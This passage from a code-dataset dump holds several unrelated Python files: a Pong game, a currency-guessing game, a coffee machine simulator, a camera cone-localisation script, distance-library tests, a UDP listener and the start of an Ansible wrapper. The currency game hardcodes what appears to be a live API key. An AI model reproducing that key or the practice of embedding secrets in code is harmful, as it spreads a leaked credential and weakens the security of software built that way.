1.5 # Vertical movement (down or up)\n\n return x_direction, y_direction, score, score_time\n\n # If ball touches a paddle\n elif collision(left_paddle, right_paddle, ball):\n\n # If ball speed is still below maximal speed\n if abs(x_direction) < 5:\n\n # invert x movement with multiplier\n x_direction = x_direction * -1.25\n y_direction = y_direction * 1.25\n\n\n # If ball speed is above maximal speed\n elif abs(x_direction) > 5:\n\n # invert x movement without multiplier\n x_direction = x_direction * -1\n y_direction = y_direction * 1\n\n ball.set_color(random.sample(range(0, 256, 1), 3))\n left_paddle.set_color(random.sample(range(0, 256, 1), 3))\n right_paddle.set_color(random.sample(range(0, 256, 1), 3))\n pygame.mixer.Sound.play(pong_sound)\n return x_direction, y_direction, score, score_time\n\n # If nothing of the above happens\n else:\n return x_direction, y_direction, score, score_time\n\n\n# Define a function to control movement of paddle\ndef paddle_movement(command, height, paddle):\n '''\n command (int): Integer defining the movement direction on x axis\n height (int): Defines the height of the playing window\n paddle (Paddle): The paddle object of class Paddle\n\n Returns:\n command (int): Integer defining the movement after command was executed\n '''\n\n # New Paddle Position\n paddle.set_position(command)\n\n # get height of top left corner\n top_left_height = paddle.get_polygon()[0][1]\n\n # get height of down left corner\n down_left_height = paddle.get_polygon()[3][1]\n\n # Stop upward movement when upper edge is touched\n if top_left_height == height:\n command = 0\n\n # Stop upward movement when upper edge is touched\n if down_left_height == 0:\n command = 0\n\n return command\n\n\n# Create an 
AI to decide on how to move the paddle\ndef ai_movement(right_paddle, ball, x_direction, y_direction, difficulty):\n '''\n right_paddle (PaddleRight): Right paddle Object\n ball (Ball): Ball object\n x_direction (int): Integer defining the movement direction of the ball on x axis\n y_direction (int): Integer defining the movement direction of the ball on y axis\n difficulty (int): Integer defining the opponent difficulty\n\n Returns:\n ai_command (int): Command of AI to move paddle up or down\n '''\n\n # If ball is moving to the right\n if x_direction > 0:\n\n # Get current ball position\n position = ball.get_position()\n\n # Calculate final contact point of ball with right edge\n contact_point = position[1] + (y_direction / x_direction) * (WIDTH - position[0])\n\n # Add random movement to AI to prevent it from being too strong\n contact_point += random.normalvariate(0, difficulty)\n\n # If y position of paddle too high\n if right_paddle.position[1] > contact_point:\n ai_command = -3\n\n # If y position of paddle too low\n elif right_paddle.position[1] < contact_point:\n ai_command = 3\n\n # If position correct\n else:\n ai_command = 0\n\n # If ball is not moving to the right, keep the paddle still; an else\n # branch guarantees ai_command is defined before it is returned\n else:\n ai_command = 0\n\n return ai_command\n\n# Print Messages to screen\ndef write_message(screen, text, size, hposition, color):\n '''\n size (int): Size of message to be written\n hposition (int): Horizontal position of message\n text (string): Text to be depicted in message\n color (tuple): RGB code\n\n Returns:\n image with message on top of screen\n '''\n\n # Print Message\n message_font = pygame.font.SysFont(\"Comic Sans MS\", size)\n message = message_font.render(text, 1, color)\n message_rect = message.get_rect()\n message_rect.center = (WIDTH / 2, HEIGHT / 2 + hposition)\n screen.blit(message, message_rect)\n\n","repo_name":"FStiffler/Pong-Game","sub_path":"pong_game/helperFunctions.py","file_name":"helperFunctions.py","file_ext":"py","file_size_in_byte":8631,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"39030266098","text":"import requests\nimport json\nimport random\nfrom currency_converter import CurrencyConverter\nfrom Utils import Screen_cleaner\nfrom time import sleep\n\n# This game will use the free currency api to get the current exchange rate from USD to ILS,\n# will generate a new random number between 1-100\n# and will ask the user what he thinks is the value of the generated number from USD to ILS,\n# depending on the user's difficulty his answer will be correct\n# if the guessed value is within the interval surrounding the correct answer\n\n\ndef currency_rate(number):\n url = f\"https://api.apilayer.com/currency_data/convert?to=ils&from=usd&amount={number}\"\n payload = {}\n headers = {\"apikey\": \"GtUN8c7rPHjLTS6jf1iJvY83b918PKPQ\"}\n\n response = requests.request(\"GET\", url, headers=headers, data=payload)\n status_code = response.status_code\n result = response.text\n class Payload(object):\n def __init__(self, result):\n self.__dict__ = json.loads(result)\n\n p = Payload(result)\n return p\n\n\ndef random_dollar():\n dollar = random.randint(1, 100)\n return int(dollar)\n\n\ndef get_money_interval(d, t):\n # Will get the current currency rate from USD to ILS and will generate an interval as follows:\n # a. 
for given difficulty d, and value of money t the interval will be: (t- (5-d), t+ (5-d))\n c = CurrencyConverter()\n lower_bound = t - (5 - d)\n upper_bound = t + (5 - d)\n # print(\"\\n\", lower_bound, upper_bound)\n lower_bound_con = c.convert(lower_bound, 'USD', 'ILS')\n upper_bound_con = c.convert(upper_bound, 'USD', 'ILS')\n # print(\"\\n\", lower_bound_con, upper_bound_con)\n # interval_after_exchange = (currency_rate(lower_bound).result, currency_rate(upper_bound).result)\n interval_after_exchange = (lower_bound_con, upper_bound_con)\n return interval_after_exchange\n\n\ndef get_guess_from_user(t):\n # A method to prompt a guess from the user to enter a guess of value to a given amount of USD\n con = True\n while con:\n money_guess = input(f\"Hi,Do you Think You Can Guess how much {t} is in ILS rate ? \\n\")\n if money_guess.isnumeric():\n sleep(0.1)\n return money_guess\n else:\n print(\"Its not a number please try again\")\n sleep(0.1)\n continue\n sleep(0.1)\n\n\ndef play(diff):\n # Will call the functions above and play the game. Will return True/False if the user lost or won.\n money = random_dollar()\n interval = get_money_interval(diff, money)\n\n more = True\n while more:\n # get a guess\n guess = get_guess_from_user(money)\n if int(interval[0]) <= int(guess) <= int(interval[1]):\n print(f\"Wow you are A Genius good guess !!! the exect currency is {currency_rate(money).result}\")\n sleep(2)\n Screen_cleaner()\n more = False\n sleep(0.1)\n return True\n\n else:\n print(\"nice try - better luck next time\")\n print(\"You are most welcome to try again\")\n x = input(\"Please Press 'Enter' to try again or any other key to exit \\n\")\n if x == '':\n sleep(0.1)\n continue\n else:\n print(\"Thank you - Hope to see you soon - Bye Bye :) \")\n sleep(2)\n Screen_cleaner()\n more = False\n sleep(0.1)\n sleep(0.1)\n return False\n\n\n\n","repo_name":"iatid23/WorldOfGames","sub_path":"GameServer/CurrencyRouletteGame.py","file_name":"CurrencyRouletteGame.py","file_ext":"py","file_size_in_byte":3436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"41515126838","text":"MENU = {\n \"espresso\": {\n \"ingredients\": {\n \"water\": 50,\n \"coffee\": 18,\n },\n \"cost\": 1.5,\n },\n \"latte\": {\n \"ingredients\": {\n \"water\": 200,\n \"milk\": 150,\n \"coffee\": 24,\n },\n \"cost\": 2.5,\n },\n \"cappuccino\": {\n \"ingredients\": {\n \"water\": 250,\n \"milk\": 100,\n \"coffee\": 24,\n },\n \"cost\": 3.0,\n }\n}\n\nresources = {\n \"water\": 300,\n \"milk\": 200,\n \"coffee\": 100,\n \"money\": 0\n}\n\nexpresso = MENU['espresso']['ingredients']\nlatte = MENU['latte']['ingredients']\ncappuccino = MENU['cappuccino']['ingredients']\n\ndef validations (choice):\n\n if choice == 'expresso':\n if resources['water'] < expresso['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < expresso['coffee']:\n print('Sorry there is not enough coffee.')\n return False\n \n if choice == 'latte':\n if resources['water'] < latte['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < latte['coffee']:\n print('Sorry there is not enough coffee.')\n return False\n elif resources['milk'] < latte['milk']:\n print('Sorry there is not enough milk.')\n return False\n \n if choice == 'cappuccino':\n if resources['water'] < cappuccino['water']:\n print('Sorry there is not enough water.')\n return False\n elif resources['coffee'] < cappuccino['coffee']:\n print('Sorry there is 
not enough coffee.')\n return False\n elif resources['milk'] < cappuccino['milk']:\n print('Sorry there is not enough milk.')\n return False\n\n return True\n\ndef processCoins( choice ):\n\n if not validations(choice=choice):\n return\n\n print('Please insert coins.')\n quartersChoice = int(input('How many quarters?: '))\n dimesChoice = int(input('How many dimes?: '))\n nicklesChoice = int(input('How many nickels?: '))\n penniesChoice = int(input('How many pennies?: '))\n\n quarterTotal = 0.25 * quartersChoice\n dimesTotal = 0.10 * dimesChoice\n nicklesTotal = 0.05 * nicklesChoice\n penniesTotal = 0.01 * penniesChoice\n\n totalList = [ quarterTotal, dimesTotal, nicklesTotal, penniesTotal ]\n total = sum( totalList )\n return total\n\ndef checkTransaction(choice):\n expressoCost = MENU['espresso']['cost']\n latteCost = MENU['latte']['cost']\n cappuccinoCost = MENU['cappuccino']['cost']\n\n # Collect coins a single time and reuse the total; processCoins returns\n # None when validations fail, so guard before comparing against the cost\n total = processCoins(choice=choice)\n if total is None:\n return\n\n if choice == 'expresso':\n if expressoCost > total:\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - expresso['coffee']\n resources['water'] = resources['water'] - expresso['water']\n # The machine keeps the price of the drink; the rest is change\n resources['money'] = resources['money'] + expressoCost\n\n elif choice == 'latte':\n if latteCost > total:\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - latte['coffee']\n resources['milk'] = resources['milk'] - latte['milk']\n resources['water'] = resources['water'] - latte['water']\n resources['money'] = resources['money'] + latteCost\n\n elif choice == 'cappuccino':\n if cappuccinoCost > total:\n print(\"Sorry that's not enough money. Money refunded.\")\n return\n\n resources['coffee'] = resources['coffee'] - cappuccino['coffee']\n resources['milk'] = resources['milk'] - cappuccino['milk']\n resources['water'] = resources['water'] - cappuccino['water']\n resources['money'] = resources['money'] + cappuccinoCost\n\n\ndef report():\n print(f\"Water: { resources['water']}ml \")\n print(f\"Milk: { resources['milk']}ml \")\n print(f\"Coffee: { resources['coffee']}g \")\n print(f\"Money: $ { resources['money'] }\")\n\ndef coffe_machine():\n should_run = True\n while should_run:\n print(resources)\n choice = input(\"What would you like? 
(expresso/latte/cappuccino): \").lower()\n if choice == 'expresso':\n checkTransaction(choice=choice)\n elif choice == 'latte':\n checkTransaction(choice=choice)\n elif choice == 'cappuccino':\n checkTransaction(choice=choice)\n elif choice == 'report':\n report()\n elif choice == 'off':\n should_run = False\n else:\n print('Choose a valid option')\n\ncoffe_machine()","repo_name":"kunjolee/bootcamp_100_python","sub_path":"15-coffe-machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4734,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"16170175346","text":"import numpy as np\nimport cv2\nimport pyzed.sl as sl\nfrom ReadData import read_alignment, read_calibration\nfrom Geometry import World_XY_from_uv_and_Z, inverse_perspective\nfrom utils import getBoxes\n\ndef Init():\n # Create a Camera object\n zed = sl.Camera()\n\n # Create a InitParameters object and set configuration parameters\n init_params = sl.InitParameters()\n init_params.camera_resolution = sl.RESOLUTION.RESOLUTION_HD1080 # Use HD1080 video mode\n init_params.camera_fps = 30 # Set fps at 30\n\n # Open the camera\n err = zed.open(init_params)\n if err != sl.ERROR_CODE.SUCCESS:\n exit(1)\n\n image_left = sl.Mat()\n runtime_parameters = sl.RuntimeParameters()\n\n return zed, image_left, runtime_parameters\n\ndef Record(zed, image_left, runtime_parameters):\n \n # Grab an image, a RuntimeParameters object must be given to grab()\n if zed.grab(runtime_parameters) == sl.ERROR_CODE.SUCCESS:\n # A new image is available if grab() returns SUCCESS\n # Each new frame is added to the SVO file\n \n zed.retrieve_image(image_left, sl.VIEW.VIEW_LEFT)\n # Get the timestamp at the time the image was captured\n timestamp = zed.get_timestamp(sl.TIME_REFERENCE.TIME_REFERENCE_CURRENT) \n print(\"Image resolution: {0} x {1} || Image timestamp: {2}\\n\".format(image_left.get_width(), image_left.get_height(),\n timestamp))\n\n # To recover data from sl.Mat to use it with opencv, we use the get_data() method\n # It returns a numpy array that can be used as a matrix with opencv\n img = image_left.get_data()\n\n # Close the camera\n #zed.close()\n\n return img\n\nzed, image_left, runtime_parameters = Init()\n\nwhile True:\n \n img = Record(zed, image_left, runtime_parameters)\n\n #cv2.imshow(\"Image\", img)\n # cv2.imwrite('Cones_img.png', img)\n #cv2.waitKey(100)\n\n imgpoints = getBoxes(img)\n u = [pixel[0] for pixel in imgpoints]\n v = [pixel[1] for pixel in imgpoints]\n imgpoints = [u, v]\n imgpixels = np.array(imgpoints, dtype=np.int)\n imgpoints = np.array(imgpoints, dtype=np.float64)\n\n # Load the camera parameters: \n # K - Camera matrix, d - Distortion coefficients vector,\n # R - Rotation matrix, t - Translation vector.\n\n K, d = read_calibration()\n Rinv, tinv = read_alignment()\n\n # We invert it to obtain the transformation from camera frame to world, which\n # is what OpenCV gives us by default.\n R, t = inverse_perspective(Rinv, tinv)\n\n N = imgpoints.shape[1]\n # Undistort use (1,N,2) shape so need to reshape the vector.\n imgpoints1 = imgpoints.reshape(1,N,2)\n points_undist = cv2.undistortPoints(imgpoints1, cameraMatrix=K, distCoeffs=d, dst=None, R=None, P=np.eye(3))\n points_undist = points_undist.reshape(N,2) # there is an extra level of array which we no longer need\n\n # Note that we passed in an identity matrix as the new camera matrix (\"P\"). We can pass\n # in any valid intrinsics matrix. 
The undistort function remaps the points to the new projection.\n # We have Z=0 since we chose points on the floor.\n positions = World_XY_from_uv_and_Z(points_undist, K=np.eye(3), R=R, t=t.reshape(3,1), Z=0.0)\n for i in range(len(positions)):\n cv2.putText(img, \"x:{}, y:{}\".format(positions[i][0], positions[i][1]),tuple(imgpixels[:,i]), fontFace=cv2.FONT_HERSHEY_DUPLEX, fontScale=0.6, color=(0,255,0))\n\n cv2.imshow('a',img)\n cv2.waitKey(1500)\n\n\n\n\n","repo_name":"TechnionAVFormula/Camera-Calibration","sub_path":"Perception.py","file_name":"Perception.py","file_ext":"py","file_size_in_byte":3477,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"23968705931","text":"from __future__ import annotations\n\nfrom pathlib import Path\nfrom sys import stderr\nfrom typing import Callable, NamedTuple\n\nimport pytest\nfrom utility import assert_eq_files\n\nfrom itaxotools.taxi2.distances import (\n Distance, DistanceHandler, DistanceMetric, Distances)\nfrom itaxotools.taxi2.sequences import Sequence\n\nTEST_DATA_DIR = Path(__file__).parent / Path(__file__).stem\n\n\nclass ReadTest(NamedTuple):\n fixture: Callable[[], Distances]\n input: str\n handler: DistanceHandler\n kwargs: dict = {}\n\n @property\n def input_path(self) -> Path:\n return TEST_DATA_DIR / self.input\n\n @property\n def fixed(self) -> Distances:\n return self.fixture()\n\n def validate(self) -> None:\n distances = Distances.fromPath(self.input_path, self.handler, **self.kwargs)\n generated_list = list(distances)\n fixed_list = list(self.fixed)\n assert len(fixed_list) == len(generated_list)\n for distance in fixed_list:\n assert distance in generated_list\n\n\nclass WriteTest(NamedTuple):\n fixture: Callable[[], Distances]\n output: str\n handler: DistanceHandler\n kwargs: dict = {}\n\n @property\n def fixed_path(self) -> Path:\n return TEST_DATA_DIR / self.output\n\n @property\n def fixed(self) -> Sequences:\n return self.fixture()\n\n def get_output_path(self, tmp_path) -> Path:\n return tmp_path / self.output\n\n def validate(self, output_path: Path) -> None:\n with self.handler(output_path, 'w', **self.kwargs) as file:\n for distance in self.fixed:\n file.write(distance)\n assert_eq_files(output_path, self.fixed_path)\n\n\nclass LabelTest(NamedTuple):\n metric: DistanceMetric\n label: str\n\n def check(self):\n assert self.metric == DistanceMetric.fromLabel(self.label)\n assert self.label == str(self.metric)\n\n\nclass MetricTest(NamedTuple):\n metric: DistanceMetric\n seq_x: str\n seq_y: str\n d: float\n precision: float = 0.0\n\n def check(self):\n x = Sequence('idx', self.seq_x)\n y = Sequence('idy', self.seq_y)\n r = self.metric.calculate(x, y)\n assert r.metric == self.metric\n assert r.x.id == 'idx'\n assert r.y.id == 'idy'\n if isinstance(r.d, float):\n assert abs(r.d - self.d) <= self.precision\n else:\n assert r.d == self.d\n assert r.d is None\n\n\nclass MetricFileTest(NamedTuple):\n file: str\n precision: float\n\n def get_metric_tests(self) -> iter[MetricTest]:\n path = TEST_DATA_DIR / self.file\n with DistanceHandler.Linear(path, 'r') as file:\n for d in file:\n yield MetricTest(d.metric, d.x.id, d.y.id, d.d, self.precision)\n\n\ndef distances_simple() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id2', None), 0.1),\n Distance(metric, Sequence('id1', None), Sequence('id3', None), 0.2),\n Distance(metric, Sequence('id1', None), Sequence('id4', None), 0.3),\n ])\n\n\ndef 
distances_multiple() -> Distances:\n return Distances([\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id2', None), 0.11),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id2', None), 0.12),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id2', None), 0.13),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id2', None), 0.14),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id2', None), 0.15),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id2', None), 0.16),\n\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id3', None), 0.21),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id3', None), 0.22),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id3', None), 0.23),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id3', None), 0.24),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id3', None), 0.25),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id3', None), 0.26),\n\n Distance(DistanceMetric.Uncorrected(), Sequence('id1', None), Sequence('id4', None), 0.31),\n Distance(DistanceMetric.UncorrectedWithGaps(), Sequence('id1', None), Sequence('id4', None), 0.32),\n Distance(DistanceMetric.JukesCantor(), Sequence('id1', None), Sequence('id4', None), 0.33),\n Distance(DistanceMetric.Kimura2P(), Sequence('id1', None), Sequence('id4', None), 0.34),\n Distance(DistanceMetric.NCD(), Sequence('id1', None), Sequence('id4', None), 0.35),\n Distance(DistanceMetric.BBC(0), Sequence('id1', None), Sequence('id4', None), 0.36),\n ])\n\n\ndef distances_square() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id1', None), 0.0),\n Distance(metric, Sequence('id1', None), Sequence('id2', None), 0.1),\n Distance(metric, Sequence('id1', None), Sequence('id3', None), 0.2),\n\n Distance(metric, Sequence('id2', None), Sequence('id1', None), 0.1),\n Distance(metric, Sequence('id2', None), Sequence('id2', None), 0.0),\n Distance(metric, Sequence('id2', None), Sequence('id3', None), 0.3),\n\n Distance(metric, Sequence('id3', None), Sequence('id1', None), 0.2),\n Distance(metric, Sequence('id3', None), Sequence('id2', None), 0.3),\n Distance(metric, Sequence('id3', None), Sequence('id3', None), 0.0),\n ])\n\n\ndef distances_square_unknown() -> Distances:\n metric = DistanceMetric.Unknown()\n return Distances([\n Distance(metric, dis.x, dis.y, dis.d) for dis in distances_square()\n ])\n\n\ndef distances_rectangle() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id4', None), 0.14),\n Distance(metric, Sequence('id1', None), Sequence('id5', None), 0.15),\n Distance(metric, Sequence('id1', None), Sequence('id6', None), 0.16),\n Distance(metric, Sequence('id1', None), Sequence('id7', None), 0.17),\n Distance(metric, Sequence('id1', None), Sequence('id8', None), 0.18),\n Distance(metric, Sequence('id1', None), Sequence('id9', None), 0.19),\n\n Distance(metric, Sequence('id2', None), Sequence('id4', None), 0.24),\n Distance(metric, Sequence('id2', None), Sequence('id5', None), 0.25),\n Distance(metric, Sequence('id2', None), Sequence('id6', None), 0.26),\n Distance(metric, Sequence('id2', None), Sequence('id7', None), 0.27),\n Distance(metric, Sequence('id2', None), Sequence('id8', None), 
0.28),\n Distance(metric, Sequence('id2', None), Sequence('id9', None), 0.29),\n\n Distance(metric, Sequence('id3', None), Sequence('id4', None), 0.34),\n Distance(metric, Sequence('id3', None), Sequence('id5', None), 0.35),\n Distance(metric, Sequence('id3', None), Sequence('id6', None), 0.36),\n Distance(metric, Sequence('id3', None), Sequence('id7', None), 0.37),\n Distance(metric, Sequence('id3', None), Sequence('id8', None), 0.38),\n Distance(metric, Sequence('id3', None), Sequence('id9', None), 0.39),\n ])\n\n\ndef distances_missing() -> Distances:\n metric = DistanceMetric.Uncorrected()\n return Distances([\n Distance(metric, Sequence('id1', None), Sequence('id1', None), 0.0),\n Distance(metric, Sequence('id1', None), Sequence('id2', None), None),\n\n Distance(metric, Sequence('id2', None), Sequence('id1', None), None),\n Distance(metric, Sequence('id2', None), Sequence('id2', None), 0.0),\n ])\n\n\ndef distances_extras() -> Distances:\n return Distances([\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.11),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.12),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.13),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference1', None, dict(voucher='X', organism='A')),\n 0.14),\n\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.21),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.22),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.23),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query1', None, dict(voucher='K')),\n Sequence('reference2', None, dict(voucher='Y', organism='B')),\n 0.24),\n\n Distance(\n DistanceMetric.Uncorrected(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.31),\n Distance(\n DistanceMetric.UncorrectedWithGaps(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.32),\n Distance(\n DistanceMetric.JukesCantor(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n 0.33),\n Distance(\n DistanceMetric.Kimura2P(),\n Sequence('query2', None, dict(voucher='L')),\n Sequence('reference3', None, dict(voucher='Z', organism='C')),\n None),\n ])\n\n\nread_tests = [\n ReadTest(distances_simple, 'simple.linear', DistanceHandler.Linear),\n ReadTest(distances_multiple, 'multiple.linear', DistanceHandler.Linear),\n ReadTest(distances_missing, 'missing.linear', DistanceHandler.Linear),\n\n ReadTest(distances_square_unknown, 'square.matrix', DistanceHandler.Matrix),\n ReadTest(distances_square, 'square.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n ReadTest(distances_rectangle, 'rectangle.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n 
ReadTest(distances_missing, 'missing.matrix', DistanceHandler.Matrix,\n dict(metric=DistanceMetric.Uncorrected())),\n\n ReadTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='seqid', idyHeader='id', tagX='_x', tagY='_y')),\n ReadTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxColumn=0, idyColumn=2, tagX='_x', tagY='_y')),\n]\n\n\nwrite_tests = [\n WriteTest(distances_simple, 'simple.linear', DistanceHandler.Linear,\n dict(formatter='{:.1f}')),\n WriteTest(distances_multiple, 'multiple.linear', DistanceHandler.Linear,\n dict(formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.linear', DistanceHandler.Linear,\n dict(formatter='{:.1f}')),\n\n WriteTest(distances_square, 'square.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.1f}')),\n WriteTest(distances_rectangle, 'rectangle.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.1f}')),\n\n WriteTest(distances_missing, 'missing.formatted.linear', DistanceHandler.Linear,\n dict(formatter='{:.2e}', missing='nan')),\n WriteTest(distances_missing, 'missing.formatted.matrix', DistanceHandler.Matrix,\n dict(formatter='{:.2e}', missing='nan')),\n\n WriteTest(distances_extras, 'extras.tsv', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='seqid', idyHeader='id', tagX='_x', tagY='_y', formatter='{:.2f}')),\n WriteTest(distances_missing, 'missing.formatted.linear', DistanceHandler.Linear.WithExtras,\n dict(idxHeader='idx', idyHeader='idy', tagX='', tagY='', formatter='{:.2e}', missing='nan')),\n\n]\n\n\nlabel_tests = [\n LabelTest(DistanceMetric.Uncorrected(), 'p'),\n LabelTest(DistanceMetric.UncorrectedWithGaps(), 'p-gaps'),\n LabelTest(DistanceMetric.JukesCantor(), 'jc'),\n LabelTest(DistanceMetric.Kimura2P(), 'k2p'),\n LabelTest(DistanceMetric.NCD(), 'ncd'),\n LabelTest(DistanceMetric.NCD(), 'ncd'),\n LabelTest(DistanceMetric.BBC(0), 'bbc(0)'),\n LabelTest(DistanceMetric.BBC(1), 'bbc(1)'),\n]\n\n\nmetric_tests = [\n MetricTest(DistanceMetric.Uncorrected(), 'gg-ccnccta', 'ggaccaccaa', 1.0 / 8.0),\n MetricTest(DistanceMetric.UncorrectedWithGaps(), 'gg-ccnccta', 'ggaccaccaa', 2.0 / 9.0),\n MetricTest(DistanceMetric.Uncorrected(), '---', 'nnn', None),\n]\n\n\nmetric_file_tests = [\n MetricFileTest('metrics.tsv', 0.00051),\n]\n\n\n@pytest.mark.parametrize(\"test\", read_tests)\ndef test_read_distances(test: ReadTest) -> None:\n test.validate()\n\n\n@pytest.mark.parametrize(\"test\", write_tests)\ndef test_write_distances(test: WriteTest, tmp_path: Path) -> None:\n output_path = test.get_output_path(tmp_path)\n test.validate(output_path)\n\n\n@pytest.mark.parametrize(\"test\", label_tests)\ndef test_labels(test: LabelTest) -> None:\n test.check()\n\n\n@pytest.mark.parametrize(\"test\", metric_tests)\ndef test_metrics(test: MetricTest) -> None:\n test.check()\n\n\n@pytest.mark.parametrize(\"test\", metric_file_tests)\ndef test_metrics_from_files(test: MetricFileTest) -> None:\n stack = []\n for metric_test in test.get_metric_tests():\n try:\n metric_test.check()\n except AssertionError as a:\n stack.append(a)\n for a in stack:\n print(a.args[0], '\\n', file=stderr)\n assert len(stack) == 0\n","repo_name":"iTaxoTools/TaxI2","sub_path":"tests/test_distances.py","file_name":"test_distances.py","file_ext":"py","file_size_in_byte":14469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} 
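A minimal usage sketch of the distances API exercised by the test module above, assuming the itaxotools.taxi2 package is importable; the output filename 'out.linear' is illustrative only:

from itaxotools.taxi2.distances import DistanceHandler, DistanceMetric
from itaxotools.taxi2.sequences import Sequence

# Pairwise uncorrected p-distance between two short sequences; per the
# metric tests above, 'gg-ccnccta' vs 'ggaccaccaa' gives 1/8.
x = Sequence('idx', 'gg-ccnccta')
y = Sequence('idy', 'ggaccaccaa')
distance = DistanceMetric.Uncorrected().calculate(x, y)
print(distance.x.id, distance.y.id, distance.d)

# Write the result in the linear (long) format, as the write tests do,
# formatting distances with four decimals.
with DistanceHandler.Linear('out.linear', 'w', formatter='{:.4f}') as file:
    file.write(distance)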
+{"seq_id":"73249857172","text":"#!/usr/bin/python3\n# Austin Lolli\n# Lab 3 server.py\n#\n# Usage behavior: python3 server.py $port\n\nimport sys\nimport socket\n\ndef usage():\n usg_str = \"Usage: python3 {} $port\\n\"\n sys.stderr.write(usg_str.format(sys.argv[0]))\n exit(1)\n\ntry:\n port = int(sys.argv[1])\nexcept (IndexError, ValueError):\n usage()\n\ndef listen(port):\n # creates a socket called sudp using an internet connection and udp\n sudp = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n # binds the socket to the address, using its own IP and designated port\n sudp.bind(('', port))\n # want to continually listen for messages\n while True:\n # recvfrom returns message and address of sender, store both\n message, addr = sudp.recvfrom(1024)\n message = message.decode()\n # if quit message received from talk program, close socket & stop listening\n if message == \"quit\":\n sudp.close()\n sys.exit(0)\n # any other message is printed as \"IP: message\"\n else:\n print(\"{}: {}\".format(addr[0], message))\n\nif __name__ == \"__main__\":\n listen(port)\n\n\n\n","repo_name":"austin-lolli/networks-labs","sub_path":"Lab4/listen.py","file_name":"listen.py","file_ext":"py","file_size_in_byte":1046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"4687202875","text":"\nimport json\nimport shutil\nfrom collections import namedtuple\nfrom ansible.parsing.dataloader import DataLoader\nfrom ansible.vars.manager import VariableManager\nfrom ansible.inventory.manager import InventoryManager\nfrom ansible.playbook.play import Play\nfrom ansible.executor.task_queue_manager import TaskQueueManager\nfrom ansible.plugins.callback import CallbackBase\nimport ansible.constants as C\nimport uuid\nimport os,sys\nimport tempfile\nimport pdb\n\n\nclass ResultCallback(CallbackBase):\n \"\"\"A sample callback plugin used for performing an action as results come in\n\n If you want to collect all results into a single object for processing at\n the end of the execution, look into utilizing the ``json`` callback plugin\n or writing your own custom callback plugin\n \"\"\"\n\n def v2_runner_on_ok(self, result, **kwargs):\n \"\"\"Print a json representation of the result\n\n This method could store the result in an instance attribute for retrieval later\n \"\"\"\n host = result._host\n sys.stdout.write(json.dumps({host.name: result._result}, indent=4))\n\nclass AnsibleApi:\n def __init__(self,hosts):\n 